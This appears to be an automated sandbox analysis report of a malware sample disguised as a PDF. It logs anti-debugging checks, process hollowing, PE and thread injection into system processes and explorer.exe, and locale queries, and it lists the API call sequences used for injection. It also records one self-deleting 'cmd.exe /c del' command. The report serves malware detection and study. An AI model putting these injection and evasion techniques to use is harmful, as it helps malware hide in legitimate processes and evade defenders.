Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EBC2C mov eax, dword ptr fs:[00000030h] 7_2_010EBC2C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h] 7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h] 7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h] 7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h] 7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E002D mov eax, dword ptr fs:[00000030h] 7_2_010E002D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CB02A mov eax, dword ptr fs:[00000030h] 7_2_010CB02A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CB02A mov eax, dword ptr fs:[00000030h] 7_2_010CB02A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CB02A mov eax, dword ptr fs:[00000030h] 7_2_010CB02A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CB02A mov eax, dword ptr fs:[00000030h] 7_2_010CB02A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114C450 mov eax, dword ptr fs:[00000030h] 7_2_0114C450
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114C450 mov eax, dword ptr fs:[00000030h] 7_2_0114C450
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EA44B mov eax, dword ptr fs:[00000030h] 7_2_010EA44B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010D0050 mov eax, dword ptr fs:[00000030h] 7_2_010D0050
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010D0050 mov eax, dword ptr fs:[00000030h] 7_2_010D0050
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010D746D mov eax, dword ptr fs:[00000030h] 7_2_010D746D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01172073 mov eax, dword ptr fs:[00000030h] 7_2_01172073
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01181074 mov eax, dword ptr fs:[00000030h] 7_2_01181074
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B9080 mov eax, dword ptr fs:[00000030h] 7_2_010B9080
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01133884 mov eax, dword ptr fs:[00000030h] 7_2_01133884
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01133884 mov eax, dword ptr fs:[00000030h] 7_2_01133884
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C849B mov eax, dword ptr fs:[00000030h] 7_2_010C849B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F90AF mov eax, dword ptr fs:[00000030h] 7_2_010F90AF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h] 7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h] 7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h] 7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h] 7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h] 7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h] 7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EF0BF mov ecx, dword ptr fs:[00000030h] 7_2_010EF0BF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EF0BF mov eax, dword ptr fs:[00000030h] 7_2_010EF0BF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EF0BF mov eax, dword ptr fs:[00000030h] 7_2_010EF0BF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114B8D0 mov ecx, dword ptr fs:[00000030h] 7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h] 7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01188CD6 mov eax, dword ptr fs:[00000030h] 7_2_01188CD6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136CF0 mov eax, dword ptr fs:[00000030h] 7_2_01136CF0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136CF0 mov eax, dword ptr fs:[00000030h] 7_2_01136CF0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136CF0 mov eax, dword ptr fs:[00000030h] 7_2_01136CF0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B58EC mov eax, dword ptr fs:[00000030h] 7_2_010B58EC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011714FB mov eax, dword ptr fs:[00000030h] 7_2_011714FB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EA70E mov eax, dword ptr fs:[00000030h] 7_2_010EA70E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EA70E mov eax, dword ptr fs:[00000030h] 7_2_010EA70E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114FF10 mov eax, dword ptr fs:[00000030h] 7_2_0114FF10
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114FF10 mov eax, dword ptr fs:[00000030h] 7_2_0114FF10
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0117131B mov eax, dword ptr fs:[00000030h] 7_2_0117131B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0118070D mov eax, dword ptr fs:[00000030h] 7_2_0118070D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0118070D mov eax, dword ptr fs:[00000030h] 7_2_0118070D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DF716 mov eax, dword ptr fs:[00000030h] 7_2_010DF716
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B4F2E mov eax, dword ptr fs:[00000030h] 7_2_010B4F2E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B4F2E mov eax, dword ptr fs:[00000030h] 7_2_010B4F2E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EE730 mov eax, dword ptr fs:[00000030h] 7_2_010EE730
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01188B58 mov eax, dword ptr fs:[00000030h] 7_2_01188B58
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BDB40 mov eax, dword ptr fs:[00000030h] 7_2_010BDB40
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CEF40 mov eax, dword ptr fs:[00000030h] 7_2_010CEF40
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BF358 mov eax, dword ptr fs:[00000030h] 7_2_010BF358
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BDB60 mov ecx, dword ptr fs:[00000030h] 7_2_010BDB60
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CFF60 mov eax, dword ptr fs:[00000030h] 7_2_010CFF60
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01188F6A mov eax, dword ptr fs:[00000030h] 7_2_01188F6A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E3B7A mov eax, dword ptr fs:[00000030h] 7_2_010E3B7A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E3B7A mov eax, dword ptr fs:[00000030h] 7_2_010E3B7A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C1B8F mov eax, dword ptr fs:[00000030h] 7_2_010C1B8F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C1B8F mov eax, dword ptr fs:[00000030h] 7_2_010C1B8F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01137794 mov eax, dword ptr fs:[00000030h] 7_2_01137794
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01137794 mov eax, dword ptr fs:[00000030h] 7_2_01137794
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01137794 mov eax, dword ptr fs:[00000030h] 7_2_01137794
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0116D380 mov ecx, dword ptr fs:[00000030h] 7_2_0116D380
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C8794 mov eax, dword ptr fs:[00000030h] 7_2_010C8794
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E2397 mov eax, dword ptr fs:[00000030h] 7_2_010E2397
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0117138A mov eax, dword ptr fs:[00000030h] 7_2_0117138A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EB390 mov eax, dword ptr fs:[00000030h] 7_2_010EB390
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E4BAD mov eax, dword ptr fs:[00000030h] 7_2_010E4BAD
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E4BAD mov eax, dword ptr fs:[00000030h] 7_2_010E4BAD
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E4BAD mov eax, dword ptr fs:[00000030h] 7_2_010E4BAD
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01185BA5 mov eax, dword ptr fs:[00000030h] 7_2_01185BA5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011353CA mov eax, dword ptr fs:[00000030h] 7_2_011353CA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011353CA mov eax, dword ptr fs:[00000030h] 7_2_011353CA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DDBE9 mov eax, dword ptr fs:[00000030h] 7_2_010DDBE9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h] 7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h] 7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h] 7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h] 7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h] 7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h] 7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F37F5 mov eax, dword ptr fs:[00000030h] 7_2_010F37F5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C8A0A mov eax, dword ptr fs:[00000030h] 7_2_010C8A0A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BC600 mov eax, dword ptr fs:[00000030h] 7_2_010BC600
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BC600 mov eax, dword ptr fs:[00000030h] 7_2_010BC600
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BC600 mov eax, dword ptr fs:[00000030h] 7_2_010BC600
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E8E00 mov eax, dword ptr fs:[00000030h] 7_2_010E8E00
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010D3A1C mov eax, dword ptr fs:[00000030h] 7_2_010D3A1C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EA61C mov eax, dword ptr fs:[00000030h] 7_2_010EA61C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EA61C mov eax, dword ptr fs:[00000030h] 7_2_010EA61C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B5210 mov eax, dword ptr fs:[00000030h] 7_2_010B5210
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B5210 mov ecx, dword ptr fs:[00000030h] 7_2_010B5210
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B5210 mov eax, dword ptr fs:[00000030h] 7_2_010B5210
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B5210 mov eax, dword ptr fs:[00000030h] 7_2_010B5210
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BAA16 mov eax, dword ptr fs:[00000030h] 7_2_010BAA16
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BAA16 mov eax, dword ptr fs:[00000030h] 7_2_010BAA16
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171608 mov eax, dword ptr fs:[00000030h] 7_2_01171608
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F4A2C mov eax, dword ptr fs:[00000030h] 7_2_010F4A2C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F4A2C mov eax, dword ptr fs:[00000030h] 7_2_010F4A2C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0116FE3F mov eax, dword ptr fs:[00000030h] 7_2_0116FE3F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BE620 mov eax, dword ptr fs:[00000030h] 7_2_010BE620
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01144257 mov eax, dword ptr fs:[00000030h] 7_2_01144257
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B9240 mov eax, dword ptr fs:[00000030h] 7_2_010B9240
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B9240 mov eax, dword ptr fs:[00000030h] 7_2_010B9240
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B9240 mov eax, dword ptr fs:[00000030h] 7_2_010B9240
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B9240 mov eax, dword ptr fs:[00000030h] 7_2_010B9240
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h] 7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h] 7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h] 7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h] 7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h] 7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h] 7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C766D mov eax, dword ptr fs:[00000030h] 7_2_010C766D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F927A mov eax, dword ptr fs:[00000030h] 7_2_010F927A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0116B260 mov eax, dword ptr fs:[00000030h] 7_2_0116B260
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0116B260 mov eax, dword ptr fs:[00000030h] 7_2_0116B260
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01188A62 mov eax, dword ptr fs:[00000030h] 7_2_01188A62
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h] 7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h] 7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h] 7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h] 7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h] 7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0114FE87 mov eax, dword ptr fs:[00000030h] 7_2_0114FE87
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010ED294 mov eax, dword ptr fs:[00000030h] 7_2_010ED294
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010ED294 mov eax, dword ptr fs:[00000030h] 7_2_010ED294
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h] 7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h] 7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h] 7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h] 7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h] 7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011346A7 mov eax, dword ptr fs:[00000030h] 7_2_011346A7
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CAAB0 mov eax, dword ptr fs:[00000030h] 7_2_010CAAB0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CAAB0 mov eax, dword ptr fs:[00000030h] 7_2_010CAAB0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01180EA5 mov eax, dword ptr fs:[00000030h] 7_2_01180EA5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01180EA5 mov eax, dword ptr fs:[00000030h] 7_2_01180EA5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01180EA5 mov eax, dword ptr fs:[00000030h] 7_2_01180EA5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EFAB0 mov eax, dword ptr fs:[00000030h] 7_2_010EFAB0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E36CC mov eax, dword ptr fs:[00000030h] 7_2_010E36CC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E2ACB mov eax, dword ptr fs:[00000030h] 7_2_010E2ACB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F8EC7 mov eax, dword ptr fs:[00000030h] 7_2_010F8EC7
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01188ED6 mov eax, dword ptr fs:[00000030h] 7_2_01188ED6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0116FEC0 mov eax, dword ptr fs:[00000030h] 7_2_0116FEC0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E2AE4 mov eax, dword ptr fs:[00000030h] 7_2_010E2AE4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E16E0 mov ecx, dword ptr fs:[00000030h] 7_2_010E16E0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C76E2 mov eax, dword ptr fs:[00000030h] 7_2_010C76E2
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\logagent.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mobsync.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0045EEE8 VirtualAlloc,LdrInitializeThunk,VirtualAlloc,VirtualProtect,FreeLibrary,LdrInitializeThunk,LdrInitializeThunk, 0_2_0045EEE8

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique Show sources
Source: C:\Windows\SysWOW64\logagent.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 160000 Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 970000 Jump to behavior
Maps a DLL or memory area into another process Show sources
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 4C0000
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 4D0000
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 72480000
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 9F0000
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: A00000
Allocates memory in foreign processes
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 4C0000 protect: page execute and read and write
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 4D0000 protect: page execute and read and write
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 72480000 protect: page execute and read and write
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 9F0000 protect: page execute and read and write
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: A00000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A
Source: C:\Users\user\Contacts\Wkklnmcz.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 72480000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\logagent.exe Thread APC queued: target process: C:\Windows\explorer.exe
Contains functionality to inject code into remote processes
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_0359CB3C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 10_2_0359CB3C
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\logagent.exe Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\mobsync.exe Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3352
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Contacts\Wkklnmcz.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 4D0000
Source: C:\Users\user\Contacts\Wkklnmcz.exe Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: A00000
Contains functionality to inject threads in other processes
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_035A4660 VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpyA,WriteProcessMemory,CreateRemoteThread,CloseHandle, 10_2_035A4660
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Contacts\Wkklnmcz.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Contacts\Wkklnmcz.exe Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\SysWOW64\mobsync.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\logagent.exe"
May try to detect the Windows Explorer process (often used for injection)
Source: DOC209272621615.PDF.exe, explorer.exe Binary or memory string: Program Manager
Source: explorer.exe Binary or memory string: Progman\Pr
Source: DOC209272621615.PDF.exe, explorer.exe Binary or memory string: Shell_TrayWnd
Source: DOC209272621615.PDF.exe, explorer.exe Binary or memory string: Progman
Source: DOC209272621615.PDF.exe, explorer.exe Binary or memory string: Progmanlock
Source: explorer.exe Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA, 0_2_00405E80
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA, 6_2_00405E80
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: GetLocaleInfoA, 6_2_0040B954
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: LdrInitializeThunk,GetLocaleInfoA, 6_2_0040B9A0
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA, 10_2_00405E80
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: GetLocaleInfoA, 10_2_0040B954
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: LdrInitializeThunk,GetLocaleInfoA, 10_2_0040B9A0
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA,lstrcpynA,LdrInitializeThunk,LoadLibraryExA, 10_2_00405F8C
